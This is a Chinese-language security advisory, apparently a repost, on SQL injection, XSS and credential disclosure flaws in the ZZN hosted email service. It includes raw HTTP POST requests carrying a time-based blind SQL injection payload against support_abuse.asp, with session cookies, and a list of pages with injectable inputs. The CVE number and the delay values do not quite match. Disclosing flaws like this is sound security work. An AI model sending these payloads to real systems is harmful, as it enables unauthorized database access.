ZZN SQL注入/XSS/凭证泄露漏洞

发布日期:2013-08-09
更新日期:2013-08-11

受影响系统:
zzn zzn
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2007-0177

ZZN是虚拟主机电子邮件服务。

ZZN在实现上存在多个XSS、远程盲SQL注入、凭证泄露漏洞,这些漏洞可导致远程攻击者执行未授权数据库操作等。

<*来源:Juan Carlos García
 
  链接:http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=

 

2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com

%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=

Proof Of Concept
----------------

These files have at least one input (GET or POST).


/membersarea_en/home.asp - 3 inputs

/membersarea_en/joinframes.asp - 2 inputs

/membersarea_en/emailaccount.asp - 4 inputs

/membersarea_en/preminder.asp - 1 inputs

/membersarea_en/signup.asp - 2 inputs

/membersarea_en/support.asp - 1 inputs

/membersarea_en/insidelogin.asp - 2 inputs

/membersarea_en/directemailerror.asp - 1 inputs

/membersarea_en/alertwindow.asp - 1 inputs

/membersarea_en/loginerror.asp - 1 inputs

/membersarea_en/support_abuse.asp - 1 inputs

/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs

/membersarea_en/directregister.asp - 1 inputs

/zlog - 1 inputs

/zlog/blog_error.asp - 1 inputs

建议:
--------------------------------------------------------------------------------
厂商补丁:

zzn
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zzn.com

相关推荐